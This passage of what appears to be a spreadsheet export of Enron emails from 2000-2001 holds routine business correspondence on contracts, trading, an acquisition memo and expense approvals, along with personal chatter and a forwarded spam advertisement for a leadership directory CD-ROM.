From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:07 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I knew you would like that_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:07 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
that was a good comeback_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:05 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
maybe I like trouble_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:05 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	_x000D_
_x000D_
you better be careful about drinks I think you might be in trouble</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 08:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Salmon Energy Turbine Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kent,_x000D_
_x000D_
I can get a redline done for you if you want to tell me what it should be _x000D_
redlined against._x000D_
_x000D_
I don't know about getting rid of the requirement for the inhouse counsel _x000D_
opinion.  Maybe after you look at things we can discuss it._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/06/2001 03:08 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;pthompson@akllp.com&gt; on 04/02/2001 04:56:21 PM_x000D_
To: "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt;_x000D_
cc: "Pipitone, Paul" &lt;paulpipitone@akllp.com&gt; _x000D_
_x000D_
Subject: Salmon Energy Turbine Agreement_x000D_
_x000D_
_x000D_
_x000D_
 Attached please find the latest Salmon Energy Turbine Agreement_x000D_
(second document below), as well as a blackline (first document below)_x000D_
showing changes made to the version circulated last Friday.  Pursuant to_x000D_
your instructions, the performance values in Article 10 are per the 24_x000D_
Unit master agreement.  In addition no changes have been made to the_x000D_
Maximum or Unit Liability Amounts or payment schedule. To complete the_x000D_
agreement, we will need to insert the date of execution and Exhibit H-2._x000D_
_x000D_
 &lt;&lt;Comparison of Versions 2 to 3 of Salmon Energy Agreement.DOC&gt;&gt;_x000D_
&lt;&lt;Salmon Energy Agreement - Version 3.DOC&gt;&gt; _x000D_
 - Comparison of Versions 2 to 3 of Salmon Energy Agreement.DOC_x000D_
 - Salmon Energy Agreement - Version 3.DOC_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 04:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>It wasn't just me changing plans.  All I ask is that sometime over the _x000D_
weekend we see Finding Forrester.  And of course get my car aligned Sat. and _x000D_
a tuneup Monday.  Now that I'm thinking about it I'm going to be spending a _x000D_
lot of money this weekend on things that aren't exactly fun.  Oh well.  _x000D_
_x000D_
I'm planning to get out of here around 4:30ish if nothing goes wrong.  So _x000D_
just call me at home when you get home.  Oh, yeah....Chipper means happy, or _x000D_
in a good mood, kind of in a bouncy mood._x000D_
_x000D_
Talk to ya later,_x000D_
Robin</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 02:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.baumbach@enron.com', 'harry.bucalo@enron.com', 'bill.kyle@enron.com', "o'neal.winfree@enron.com", 'george.hope@enron.com', 'michael.walters@enron.com', 'eric.bass@enron.com', 'matthew.lenhart@enron.com'})</t>
  </si>
  <si>
    <t>John Elway's baby</t>
  </si>
  <si>
    <t xml:space="preserve"> - Teef.jpg_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Mar 2000 11:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jstoner@gdclaw.com'})</t>
  </si>
  <si>
    <t>Re: ISDA Master</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your message.  We are in the process of turning a blackline.  Sara_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Stoner, John E." &lt;JStoner@gdclaw.com&gt; on 03/15/2000 04:52:47 PM_x000D_
To: "'sshackl@enron.com'" &lt;sshackl@enron.com&gt;_x000D_
cc:  _x000D_
Subject: ISDA Master_x000D_
_x000D_
_x000D_
Phil Morley asked me to follow up on the status of the ISDA Master.  I think_x000D_
you have everything you needed from me--please let me know if I'm wrong._x000D_
Phil would like us to proceed with finalizing the form of the ISDA master_x000D_
even if the pulp plant purchase is not scheduled until June.  I look forward_x000D_
to hearing from you.  Thanks._x000D_
_x000D_
==============================================================================_x000D_
_x000D_
This message may contain confidential and privileged information.  If it has _x000D_
been sent to you in error, please reply to advise the sender of the error and _x000D_
then immediately delete this message._x000D_
_x000D_
==============================================================================_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 16:27:06 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'enron_update@concureworkplace.com'})</t>
  </si>
  <si>
    <t>frozenset({'bwillia5@enron.com'})</t>
  </si>
  <si>
    <t>&lt;&lt;Concur Expense Document&gt;&gt; - Meyers, Bert  1/25/02</t>
  </si>
  <si>
    <t>The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Albert L. Meyers_x000D_
Status last changed by: Jill C. Chatterton_x000D_
Expense Report Name: Meyers, Bert  1/25/02_x000D_
Report Total: $76.63_x000D_
Amount Due Employee: $76.63_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur Expense._x000D_
http://expensexms.enron.com</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 15:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Jarnold</t>
  </si>
  <si>
    <t xml:space="preserve">do you still have the magazine and if so can you send it to me?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Zerilli, Frank" &lt;fzerilli@POWERMERCHANTS.COM&gt; on 03/23/2001 12:05:51 PM_x000D_
To: "'jarnold@enron.com'" &lt;jarnold@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Jarnold_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 Jarnold_x000D_
_x000D_
 - Jarnold.jpg_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 00:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>http://sportsillustrated.cnn.com/football/college/2000/bowl_projections/_x000D_
_x000D_
just wanted to let you know that lsu is still projected to go to the sharpie _x000D_
bowl!</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rosalyn.lum@enron.com', 'kristi.fredericks@enron.com', 'stephen.wolfe@enron.com', 'brian.dawson@enron.com', 'lisa.best@enron.com', 'stacy.hardy@enron.com', 'laynie.east@enron.com', 'dana.davis@enron.com', 'susan.rance@enron.com', 'tammy.barta@enron.com', 'rufino.doroteo@enron.com', 'brad.carey@enron.com', 'lisa.kang@enron.com', 'marnie.lamb@enron.com', 'pam.becton@enron.com', 'brian.schwertner@enron.com', 'lisa.king@enron.com'})</t>
  </si>
  <si>
    <t>January 2001 Journal Entries</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
	_x000D_
	_x000D_
Here is a list of journal entries for January that we have.  They will be _x000D_
ready to be filed/signed.  Pam and Marnie will have the ones the will require _x000D_
a signature._x000D_
_x000D_
_x000D_
 To Be Filed   Signature Required_x000D_
Co.  0002    01N2 _x000D_
 0003    0272_x000D_
 052K    0942_x000D_
 1311    046K_x000D_
 0935    1319_x000D_
 0958    028P_x000D_
 034M    1313_x000D_
 037H    1380_x000D_
 040N    1381_x000D_
 0398    1314_x000D_
 0914    072R_x000D_
 0915    0527_x000D_
 0961    0919_x000D_
 1298    1297_x000D_
 0957_x000D_
 _x000D_
_x000D_
 _x000D_
Any other entries that need to be filed can be dropped at my desk._x000D_
_x000D_
Thanks, _x000D_
_x000D_
dd</t>
  </si>
  <si>
    <t>Mon, 3 Dec 2001 10:37:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'9069876@skytel.com'})</t>
  </si>
  <si>
    <t>should i stop working?  no big deal, really.  but don't want to continue, if it doesn't make sense.  thanks, jeff</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>REMOVE</t>
  </si>
  <si>
    <t xml:space="preserve">What do you think? If you think this would be useful, go ahead and order it._x000D_
----- Forwarded by Steven J Kean/NA/Enron on 10/04/2000 04:22 PM -----_x000D_
_x000D_
	"Dvorkin, Robert" &lt;dvorkin@sewkis.com&gt;_x000D_
	10/03/2000 10:51 AM_x000D_
		 _x000D_
		 To: "'Arthur Tane'" &lt;aapi@aapi.com.au&gt;, USL &lt;rws@sayer.com&gt;, USL _x000D_
&lt;s031rbr@zionsbank.com&gt;, USL &lt;safeenergy@erols.com&gt;, USL _x000D_
&lt;sal@livingstrongrp.com&gt;, USL &lt;sam@freedomproject.org&gt;, USL _x000D_
&lt;sbarton@usmayors.org&gt;, USL &lt;sbvr@shawbransford.com&gt;, USL _x000D_
&lt;schagrin@erols.com&gt;, USL &lt;scutter@mmlk.com&gt;, USL &lt;sda@sda-inc.com&gt;, USL _x000D_
&lt;sgattys@lava.net&gt;, USL &lt;shall@mstlaw.com&gt;, USL &lt;simoncode@aol.com&gt;, SKNYC _x000D_
&lt;sknyc@sewkis.com&gt;, USL &lt;skean@enron.com&gt;, USL &lt;sklick2@alleghenyenergy.com&gt;, _x000D_
USL &lt;smrussell@ashland.com&gt;, USL &lt;spradlobby@aol.com&gt;, USL _x000D_
&lt;srkelley@swbell.net&gt;, USL &lt;sstretch@ix.netcom.com&gt;, USL _x000D_
&lt;stateside@stateside.com&gt;, USL &lt;stb@spilanlaw.com&gt;, USL &lt;steve.meier@tm.com&gt;, _x000D_
USL &lt;steve@bkbh.com&gt;, USL &lt;steven.kline@pge-corp.com&gt;, USL _x000D_
&lt;steven.powell@equifax.com&gt;, USL &lt;strategy@hawthorngroup.com&gt;, USL _x000D_
&lt;sue.neiderheiser@micorp.com&gt;, USL &lt;swojdak@wojdak.com&gt;, USL _x000D_
&lt;sxb@amtrak.com&gt;, USL &lt;sydelle_lyon@marconi-gr.com&gt;, USL _x000D_
&lt;tamaccu@inland.com&gt;, USL &lt;tamsin_smith@gap.com&gt;, USL _x000D_
&lt;tcr666@worldnet.att.net&gt;, USL &lt;terrance.s.martiesian@banet.net&gt;, USL _x000D_
&lt;terryharmann@alliant-energy.com&gt;, USL &lt;tgorrie@corus.jnj.com&gt;, USL _x000D_
&lt;TheSpecGrp@aol.com&gt;, USL &lt;thevgroup@aol.com&gt;, USL _x000D_
&lt;thomas.h.weaver@nspco.com&gt;, USL &lt;thomas.ross@hq.loral.com&gt;, USL _x000D_
&lt;thomas_grissom@vencor.com&gt;, USL &lt;thorupg@hro.com&gt;, USL _x000D_
&lt;tjohnson@oshtruck.com&gt;, USL &lt;tmvthomas@aol.com&gt;, USL _x000D_
&lt;toker000@mail.genmills.com&gt;, USL &lt;tom_finnigan@praxair.com&gt;, USL _x000D_
&lt;transforum@igc.org&gt;, USL &lt;tsc@senior.org&gt;, USL &lt;tschatz@cagw.org&gt;_x000D_
		 cc: _x000D_
		 Subject: REMOVE_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Arthur Tane [mailto:aapi@aapi.com.au]_x000D_
Sent: Wednesday, September 13, 2000 4:27 PM_x000D_
To: USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; SKNYC; _x000D_
USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; _x000D_
USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; USL; _x000D_
USL; USL; USL; USL; USL; USL_x000D_
Subject: For The Library: Who's Who in the Leadership of the United States _x000D_
CD-Rom_x000D_
_x000D_
 _x000D_
Who's Who in the Leadership_x000D_
of the United States_x000D_
 _x000D_
CD-ROM_x000D_
 _x000D_
 _x000D_
The Leadership CD-Rom covers every sector of the business, government, _x000D_
professional and nonprofit worlds of the United States of America. Up-to-date _x000D_
and current, this CD-Rom functions as a powerful research tool, offering _x000D_
unparalleled access to the 400,000 individuals who comprise the institutional _x000D_
leadership of the United States._x000D_
 _x000D_
The Leadership CD-Rom consists of the following 14 parts or directories:_x000D_
 _x000D_
 _x000D_
CONGRESSIONAL DIRECTORY:_x000D_
 _x000D_
The most current information available on who's who in Congress, including _x000D_
senators and representatives, their committee and subcommittee assignments, _x000D_
and key staff._x000D_
 _x000D_
FEDERAL DIRECTORY:_x000D_
 _x000D_
Identifies over 38,000 government officials in the Executive Office of the _x000D_
President, cabinet-level departments, and more than 70 federal agencies._x000D_
 _x000D_
STATE DIRECTORY:_x000D_
 _x000D_
Provides information on over 35,000 state officials in the executive and _x000D_
legistative branches of the 50 U.S. State governments._x000D_
 _x000D_
MUNICIPAL DIRECTORY:_x000D_
 _x000D_
Includes contact information for over 32,000 elected and administrative _x000D_
officials of leading cities, counties and local authorities in the United _x000D_
States._x000D_
 _x000D_
FEDERAL REGIONAL DIRECTORY:_x000D_
 _x000D_
Information on over 36,000 federal decision-makers located outside of _x000D_
Washington, DC, enabling users to reach the offices with the appropriate _x000D_
jurisdictions._x000D_
 _x000D_
JUDICIAL DIRECTORY:_x000D_
 _x000D_
Provides details on 3,200 federal and state judges, including staff and law _x000D_
clerks, with the law schools they attended, as well as detailed biographical _x000D_
information on each judge._x000D_
 _x000D_
CORPORATE YELLOW PAGES:_x000D_
 _x000D_
Provides names and titles of over 51,000 executives and their corporations, _x000D_
the nature of each enterprise, including  more than 10,000 corporate board _x000D_
members and their business affiliations._x000D_
 _x000D_
FINANCIAL DIRECTORY:_x000D_
 _x000D_
Includes over 36,000 leaders in all financial fields, with board member _x000D_
affiliations.  Provides individual titles, functions, and contact details._x000D_
 _x000D_
NEWS MEDIA DIRECTORY:_x000D_
 _x000D_
Enables users to communicate their ideas or publicize information effectively _x000D_
to over 34,000 journalists at 2,700 national news media organisations._x000D_
 _x000D_
ASSOCIATIONS DIRECTORY:_x000D_
 _x000D_
Lists over 43,000 officers at 1,100 trade and professional organisations, _x000D_
keeping users current with chief state executive turnover, changes in staff _x000D_
and governing boards, and mergers and name changes._x000D_
 _x000D_
LAW FIRMS DIRECTORY:_x000D_
 _x000D_
Identifies over 23,000 partners who make the business decisions and manage _x000D_
the practice areas of the nation's 800 leading law firms._x000D_
 _x000D_
GOVERNMENT AFFAIRS DIRECTORY:_x000D_
 _x000D_
Lists over 19,000 government affairs experts in fields such as legislative _x000D_
affairs, environmental affairs, and international trade. Details the issues _x000D_
they contest and the coalitions they form._x000D_
 _x000D_
FOREIGN REPRESENTATIVES DIRECTORY:_x000D_
 _x000D_
Includes Information on foreign representatives at embassies, consulates , _x000D_
and intergovernmental organisations in the United States. Lists U.S. _x000D_
executives of over 1,300 foreign corporations and more than 340 foreign _x000D_
financial institutions with offices in the United States._x000D_
 _x000D_
NONPROFIT SECTOR DIRECTORY:_x000D_
 _x000D_
Provides contact information for over 40,000 nonprofit sector executives and _x000D_
trustees at over 1,000 nonprofit organizations, including foundations, _x000D_
colleges and universities and museums, performing arts groups and centers, _x000D_
medical institutions, library systems, preparatory schools, and charitable _x000D_
service organizations. _x000D_
 _x000D_
Features of entries in this CD-Rom include up-to-date:_x000D_
 _x000D_
* Mailing address, telephone , fax  and e-mail information_x000D_
* Website addresses_x000D_
* Biographical information or Corporate/Organizational information_x000D_
* Photograph of each listed individual_x000D_
* Administrative support staff contact information_x000D_
* plus much more !_x000D_
 _x000D_
Functions:_x000D_
 _x000D_
&gt; Browse.  Browse each directory's table of contents by individual or _x000D_
organization name, or within an organisation by department._x000D_
 _x000D_
&gt; View.  View pages on screen as clearly and graphically as if they were in _x000D_
printed directories._x000D_
 _x000D_
&gt; Search.  Search with numerous selection criteria to create customised lists _x000D_
of individuals and organizations._x000D_
 _x000D_
&gt; Export.  Export search results in convenient formats for mailing lists or _x000D_
data base mergers._x000D_
 _x000D_
&gt; Link.  With an Internet connection, link from the CD-Rom to thousands of _x000D_
websites and e-mail addresses.   _x000D_
 _x000D_
 _x000D_
The Leadership CD-Rom has over 55 indexes thus helping researchers to locate _x000D_
individuals and organisations throughout the United States in a wide variety _x000D_
of ways._x000D_
 _x000D_
An essential reference tool for professional researchers, governments, _x000D_
libraries and corporations,  The Leadership CD-Rom is available in a easy to _x000D_
use Windows-based inferface enabling users quick access to vital information._x000D_
 _x000D_
US$525.00 including delivery worldwide._x000D_
 _x000D_
_x000D_
 _x000D_
ORDER FORM_x000D_
 _x000D_
To purchase your copy of THE LEADERSHIP CD-ROM, please fill out this Order _x000D_
Form and return it to:_x000D_
 _x000D_
ASIA PACIFIC INFOSERV, GPO BOX 2987, SYDNEY 1043  AUSTRALIA_x000D_
Tel: 61 2 4934.6290     Fax: 61 2 4934.3692     E-mail: aapi@aapi.com.au_x000D_
ABN:  43 461 915 913_x000D_
 _x000D_
 _x000D_
Please send ........  copies of THE LEADERSHIP CD-ROM @ only $US525._x000D_
 _x000D_
 _x000D_
Payment Options:_x000D_
 _x000D_
1.  A Cheque for $US ............ payable to Asia Pacific InfoServ is _x000D_
enclosed._x000D_
 _x000D_
2.  A Bank Transfer for $US .......... has been made to your account._x000D_
 _x000D_
      Australia and New Zealand (ANZ) Banking Group,_x000D_
      Hunter Street, Newcastle, 2300  Australia_x000D_
 _x000D_
      Account Name:  Asia Pacific InfoServ_x000D_
      Account No:        012770.351431638_x000D_
 _x000D_
3.   Visa / Mastercard facilities available._x000D_
 _x000D_
 _x000D_
Please send to:_x000D_
 _x000D_
____________________________________________________________x000D_
 _x000D_
____________________________________________________________x000D_
 _x000D_
____________________________________________________________x000D_
 _x000D_
_x000D_
 _x000D_
Remove -_x000D_
 _x000D_
If you would like to be removed from this list, reply to this message with _x000D_
the word REMOVE in the subject line._x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 11:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: MAC Language</t>
  </si>
  <si>
    <t xml:space="preserve">Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 07/05/2000 06:17 PM -----_x000D_
_x000D_
	"Giessen, Luanne" &lt;luanne.giessen@gs.com&gt;_x000D_
	07/05/2000 04:35 PM_x000D_
		 _x000D_
		 To: "'Carol St Clair'" &lt;Carol.St.Clair@enron.com&gt;_x000D_
		 cc: Tana Jones &lt;Tana.Jones@enron.com&gt;_x000D_
		 Subject: RE: MAC Language_x000D_
_x000D_
_x000D_
That was my understanding, but when I saw your draft I thought you had_x000D_
changed your mind.  Please revise the draft to those terms and re-send it to_x000D_
me._x000D_
_x000D_
Luanne Giessen_x000D_
Telephone:  (212) 902-0580_x000D_
Facsimile:  (212) 428-1582_x000D_
e-mail address:  luanne.giessen@gs.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Carol St Clair [mailto:Carol.St.Clair@enron.com]_x000D_
Sent: Wednesday, July 05, 2000 3:02 PM_x000D_
To: Giessen, Luanne_x000D_
Cc: Tana Jones_x000D_
Subject: MAC Language_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Luanne:_x000D_
I made a mistake on the language that we sent you on MAC.  On the last part_x000D_
where it talks about a failure to be rated, my understanding from our_x000D_
discussions is that a MAC would only be triggered if a party's credit_x000D_
support_x000D_
provider failed to be rated by either S&amp;P or Moody's  so that if it lost one_x000D_
rating but maintained the other rating a MAC would not be triggered.  For_x000D_
this_x000D_
reason the amendment should read ...or its Credit Support Provider shall_x000D_
fail to_x000D_
have a rating from either S&amp;P or Moody's._x000D_
_x000D_
Please confirm that this is your understanding and sorry for the confusion._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 23:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'neil.davies@enron.com', 'pierre.aury@enron.com', 'george.mcclellan@enron.com', 'stephen.douglas@enron.com', 'sally.beck@enron.com', 'stuart.staley@enron.com', 'chris.mahoney@enron.com', 'gary.hickerson@enron.com', 'cindy.skinner@enron.com', 'kathryn.corbally@enron.com', 'lisa.yoho@enron.com', 'shanna.funkhouser@enron.com', 'beth.perlman@enron.com', 'scott.tholan@enron.com', 'per.sekse@enron.com', 'mark.frevert@enron.com', 'rick.bergsieker@enron.com', 'thomas.myers@enron.com', 'jeffrey.shankman@enron.com', 'brent.price@enron.com', 'mike.mcconnell@enron.com', 'doug.arnell@enron.com', 'mark.tawney@enron.com', 'larry.lawyer@enron.com', 'john.nowlan@enron.com', 'vince.kaminski@enron.com', 'alan.aronowitz@enron.com', 'eric.gonzales@enron.com', 'jennifer.fraser@enron.com', 'daniel.reck@enron.com'})</t>
  </si>
  <si>
    <t>WebModal</t>
  </si>
  <si>
    <t xml:space="preserve">Please read the following message from Dan Reck regarding WebModal.  Thank _x000D_
you._x000D_
_x000D_
----- Forwarded by Cathy Phillips/HOU/ECT on 02/14/2001 07:25 AM -----_x000D_
_x000D_
	Daniel Reck_x000D_
	02/13/2001 01:48 PM_x000D_
		 _x000D_
		 To: Cathy Phillips/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: WebModal_x000D_
_x000D_
_x000D_
_x000D_
At Monday's EGM meeting, Mike McConnell asked me to describe the WebModal _x000D_
acquisition EGM made last week.  Following is a brief description of the _x000D_
freight capacity market and what WebModal gets us:_x000D_
_x000D_
Market_x000D_
_x000D_
The US market for logistics is $600bn annually.  We are pursuing the largest _x000D_
homogenous segment which is long-haul truckload and intermodal.  That market _x000D_
is $50-$100bn annually, depending on who you ask and whether you include _x000D_
dedicated fleets._x000D_
_x000D_
The interesting thing about these markets is that they are extremely _x000D_
fragmented and massively intermediated.  There are over 100,000 trucking _x000D_
companies (carriers) in the US and thousands of independent brokers (brokers _x000D_
in this market act as credit principals).  10-20% of all loads are conducted _x000D_
in the spot market (brokered) and the rest are done under 1-3 year contracts _x000D_
that are generally non-firm, but define the relationship between each shipper _x000D_
and their chosen carriers or intermediaries._x000D_
_x000D_
On the rail side, the US railroads act as wholesalers, selling their capacity _x000D_
to Intermodal Marketing Companies (IMCs).  The IMCs then retail or broker out _x000D_
that capacity to shippers.  The difficult part of ground intermodal is that _x000D_
the rail haul makes up only the long-haul component.   The trip from the _x000D_
origin warehouse to the origin rail yard and then the delivery from the _x000D_
destination rail yard to the destination warehouse has to be done by truck.  _x000D_
This first and last mile transportation is called "drayage".  _x000D_
_x000D_
WebModal_x000D_
_x000D_
WebModal developed a system to price and schedule intermodal moves so they _x000D_
look identical to truck.  They have a database with prices and schedules from _x000D_
all the RRs and 48 drayage companies that gives them complete US coverage.  A _x000D_
buyer can type in their scheduling and equipment requirements and receive _x000D_
instantaneous quotes for zipcode to zipcode service._x000D_
_x000D_
Because of the inherently different cost and performance structures of rail _x000D_
and truck, the pricing differences between the two modes of transportation is _x000D_
significant.  For any move greater than 500 miles, intermodal is generally _x000D_
20-30% less expensive than a single driver truck move.  The substitutability _x000D_
of intermodal and truckload should allow us to trade the spread in price._x000D_
_x000D_
The WebModal acquisition gets us a team with tremendous industry expertise _x000D_
and a good head start as we enter this market.  The next move will be to _x000D_
build a truck intermediation capability.  _x000D_
_x000D_
I encourage you to meet Chris Kravas the CEO of WebModal.  He will be _x000D_
spending all of his time in Houston when he is not on the road._x000D_
_x000D_
Please give me a call if you have any questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dan Reck_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 08:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>tfs checkout</t>
  </si>
  <si>
    <t>500380 broker has 109.95_x000D_
_x000D_
missing deal for jeff_x000D_
_x000D_
sell morgan_x000D_
110.00_x000D_
Q2_x000D_
np15_x000D_
25 mw_x000D_
off peak_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 09:54:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.arnold@enron.com', 'john.lavorato@enron.com'})</t>
  </si>
  <si>
    <t>nov nymex</t>
  </si>
  <si>
    <t>Our group has been selling NOV to hedge our short basis position.  Our phys fixed priced liquidity this morning put us in a longer nov nymex position.  We have sold 872 since 11:00 am._x000D_
_x000D_
Grigsby</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 04:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeanne.wukasch@enron.com'})</t>
  </si>
  <si>
    <t>Sea Robin</t>
  </si>
  <si>
    <t>I need to get our most recent bills for Sea Robin.  I show a contract #FSRP3, _x000D_
MDQ = 25,000, and a demand of $56,498</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 11:05:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pinnamaneni.krishnarao@enron.com'})</t>
  </si>
  <si>
    <t>Vince: I would appreciate your comments._x000D_
Thanks_x000D_
Krishna.</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 13:59:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.cummings@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jim.goughary@enron.com', 'tim.belden@enron.com', 'm..presto@enron.com', 'l..nowlan@enron.com', 'john.arnold@enron.com', 'l..wilson@enron.com'})</t>
  </si>
  <si>
    <t>REFCO Project Update</t>
  </si>
  <si>
    <t>Gentlemen_x000D_
_x000D_
I wanted to provide you an update on the status of the Refco private label platform deal.  We have had several meetings since I first presented the idea to you all.  Unfortunately, Refco's headquarters was in One World Financial Center which was severely damaged by debris from the World Trade Center collapse.  They suffered no human losses from the disaster, but their offices are off limits and all their computers and paper files are inaccessible for the time being.  They are up and running out of a Jersey City location with some back up capability._x000D_
_x000D_
To briefly summarize the discussion so far, ENW would build a Refco branded platform similar to EOL that would be accessed by Refco's customers.  Enron would provide transactable prices to the site with wider spreads and potentially smaller minimum volumes.  Refco customers would transact on the site with Refco as their counterparty and Refco would sleeve the transactions to Enron allowing us to consolidate our credit risk to a singular credit, Refco.   The products contemplated include various Nymex look-a-like products and other liquid swaps in oil, natural gas, and electricity.  Revenue would come to Enron in the form of license fees for the platform, transaction fees, and origination from the additional volume create by the wider margin products.  Revenue would come to Refco in the form of transaction fees.  Refco has a similar arrangement in place for FX with Dresner bank and have announced a similar platform for bonds and securities with Cantor Fitzgerald/E-speed._x000D_
_x000D_
All that being said, they are anxious to move the discussion forward and we have planned a visit for them to come to Houston in 2 weeks.  Attending will be Gary Weiss, SVP Refco Group Ltd. LLC and President &amp; CEO of Refco F/X Ltd LLC, and Joe Murphy, CEO Refco Futures Ltd. LLC.  The purpose of this visit is for them to give us a presentation on the Refco Group of companies, discuss the products and estimations of revenue streams based on their current futures business, and discuss the possible structure of the deal.  The meeting is scheduled to begin at 2:30pm Thursday Oct 4 and expected to last the balance of the day and possibly into the next morning.  I will approach you all individually to get your feedback on how you would like to interact with them and when.  I realize there are significant issues to be addressed._x000D_
_x000D_
Refco currently has some 175,000 collateralized customer accounts ranging from Institutional Investors &amp; locals down to individuals.  We have put these into 2 buckets which have different profiles.  Phase 1 would include the Top 2000 accounts which are largely substantial institutional investors, locals, and high net worth individuals.  If this proves successful, phase 2 would be rolled out with products designed to attract activity from the smaller investors.  The idea would be to automate the products as much as is practical. _x000D_
_x000D_
Mark Tayor in Legal has already spoken with their counsel and is comfortable that they have reviewed all the legal angles thoroughly.  Refco advises that if the have accounts back up by collateral guaranteed by them, they become Eligible Contract Participants (ECPs) able to execute derivatives.  So, they believe that the majority of the 175,000 accounts they have could be ECPs for the purposes of this deal.  Credit is reviewing the Refco financials and we plan to discuss this thoroughly during their visit._x000D_
_x000D_
Please do not hesitate to contact me at x36413 if you have any questions or comments and I will be getting in touch with you early next week to get your feedback._x000D_
_x000D_
Regards_x000D_
_x000D_
John Cummings</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 09:05:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tstaggs@enron.com'})</t>
  </si>
  <si>
    <t>Are you on the diet with me?_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld</t>
  </si>
  <si>
    <t>Tue, 11 Dec 2001 07:38:03 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Checking In</t>
  </si>
  <si>
    <t>Was Michael adorable in his holiday performance?  I'm sure he was!!!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mann, Kay _x000D_
Sent: Monday, December 10, 2001 6:27 PM_x000D_
To: Adams, Suzanne_x000D_
Subject: RE: Checking In_x000D_
_x000D_
_x000D_
Michael has his holiday performance.  Thanks for asking._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 03:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Transport Model for New Deals</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Scott Neal/HOU/ECT on 08/25/2000 10:05 AM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
